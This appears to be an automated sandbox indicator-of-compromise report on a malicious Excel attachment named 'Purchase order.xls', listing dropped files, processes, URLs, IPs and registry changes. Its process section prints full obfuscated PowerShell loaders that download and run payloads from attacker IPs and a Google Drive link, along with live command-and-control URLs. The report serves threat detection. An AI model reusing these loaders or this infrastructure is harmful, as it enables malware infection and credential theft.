IOC Report
Purchase order.xls

loading gif

Files

File Path
Type
Category
Malicious
Purchase order.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 05:30:22 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\Purchase order.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:51:02 2024, Security: 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplethingswithgreatthignsgivenmebestthings[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplethingswithgreatthignsgivenmebestthings[2].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\655DB7B3.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D6EA618.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F15ABE6.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90038BFA.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92B84E9D.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D35A1E0C.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\1f4gqch3.yb0.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\1xjhsaca.ejy.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\5fjqud0c.jvz.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES7AEA.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:51:06 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RES9251.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:51:12 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\c4uo25w2.23k.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\cj5x5cuz.uy5.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\cxperjly.vas.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\mg20lqoj.r4c.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\mogcvflq.4gp.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\v3dqwrfp.hjg.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\vigjsfpz.0ft.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\w2ilyone.qv5.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\xqzu2zun.dfy.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF2695108681295A60.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF48F43F245FA812AF.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF5CF548D4DA5D9F14.TMP
data
dropped
C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
data
dropped
C:\Users\user\Desktop\23530000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:51:02 2024, Security: 1
dropped
C:\Users\user\Desktop\23530000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 35 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://kbfvzoboss.bid/alien/fre.php
malicious
http://alphastand.top/alien/fre.php
malicious
http://alphastand.win/alien/fre.php
malicious
http://alphastand.trade/alien/fre.php
malicious
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF
192.3.176.141
malicious
http://94.156.177.220/simple/five/fre.php
94.156.177.220
malicious
http://192.3.176.141/41/SMPLRTT.txt
192.3.176.141
malicious
94.156.177.220/simple/five/fre.php
malicious
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta
192.3.176.141
malicious
https://qrisni.me/
unknown
http://192.3.176.141/41/simpleth
unknown
http://nuget.org/NuGet.exe
unknown
https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle
188.114.97.3
http://crl.entrust.net/server1.crl0
unknown
https://qrisni.me/C
unknown
http://192.3.176.141/
unknown
http://ocsp.entrust.net03
unknown
http://www.ibsensoftware.com/
unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta)-Qo
unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta/
unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta1
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://qrisni.me/Z
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaG
unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htahttp://192.3.176.141/41/c
unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta:
unknown
http://go.micros
unknown
https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&wa
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...%252525
unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaC:
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF89
unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...
unknown
https://qrisni.me/1;
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIFp
unknown
http://192.3.176.141/h
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://go.cr
unknown
There are 38 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
qrisni.me
188.114.97.3
drive.google.com
142.250.186.46
drive.usercontent.google.com
142.250.186.161

IPs

IP
Domain
Country
Malicious
192.3.176.141
unknown
United States
malicious
94.156.177.220
unknown
Bulgaria
malicious
142.250.186.46
drive.google.com
United States
188.114.97.3
qrisni.me
European Union
142.250.186.161
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
`<0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
2060
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2B75D
2B75D
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
$#0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\353F9
353F9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35560
35560
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35F6E
35F6E
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
